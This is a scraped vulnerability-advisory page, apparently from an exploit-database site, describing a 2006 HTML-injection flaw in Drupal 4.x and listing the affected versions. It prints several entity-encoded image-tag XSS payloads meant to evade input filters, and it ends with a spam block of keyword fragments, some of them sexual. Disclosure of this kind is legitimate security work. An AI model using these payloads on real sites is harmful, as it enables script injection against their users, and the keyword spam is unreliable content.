about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Drupal URL-Encoded Input HTML Injection Vulnerability


Title Drupal URL-Encoded Input HTML Injection Vulnerability
Published 2006-01-01-12:00AM
Updated 2006-01-02-08:45PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovery is credited to liz0@bsdmail.com.
Vulnerable  Drupal Drupal 4.6.5
Drupal Drupal 4.6.4
Drupal Drupal 4.6.3
Drupal Drupal 4.6.2
Drupal Drupal 4.6.1
Drupal Drupal 4.6
Drupal Drupal 4.5.7
Drupal Drupal 4.5.6
Drupal Drupal 4.5.5
Drupal Drupal 4.5.4
Drupal Drupal 4.5.3
Debian Linux 3.1
Debian Linux 3.1 alpha
Debian Linux 3.1 arm
Debian Linux 3.1 hppa
Debian Linux 3.1 ia32
Debian Linux 3.1 ia64
Debian Linux 3.1 m68k
Debian Linux 3.1 mips
Debian Linux 3.1 mipsel
Debian Linux 3.1 ppc
Debian Linux 3.1 s/390
Debian Linux 3.1 sparc
Drupal Drupal 4.5.2
Drupal Drupal 4.5.2
Drupal Drupal 4.5.1
Drupal Drupal 4.5
Drupal Drupal 4.4.3
Drupal Drupal 4.4.2
Drupal Drupal 4.4.1
Drupal Drupal 4.4
Drupal Drupal 4.2 .0 RC
Drupal Drupal 4.1 .0
Drupal Drupal 4.0 .0
Not Vulnerable  
Code   The following URL-encoded examples were provided:

<img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41>

<img src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41>

<img src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

The discoverer has also provided an online tool to encode various strings at the following location:

http://liz0zim.no-ip.org/code.php
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 04 Dec 2008 21:43:31 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
suse9 mambo Remo wanita mel t858t www.ninjaw sexy.movie News Searc girl pic WWW.arabic Yahoo Www sexy g 200 /compo Www.sexani jeux sex www.bebo.o com_jcs/vi Sivji Adult desi ive Www.world php-nuke 2 free india mambo Remo Www 23sex. trishasexv ProFTPD 1. Www girl x double fuc Amrica sex mambo remo ww sax tv Www girl x Www.pornes Sexs video bind 9.2.2 all cartoo Audlt Imag CMS is Fre Free xxx m t977t eathics Alfred sexy pamel BNB mambo Remo sexanmal Filme porn Wwwseks www.hotmai linux 6.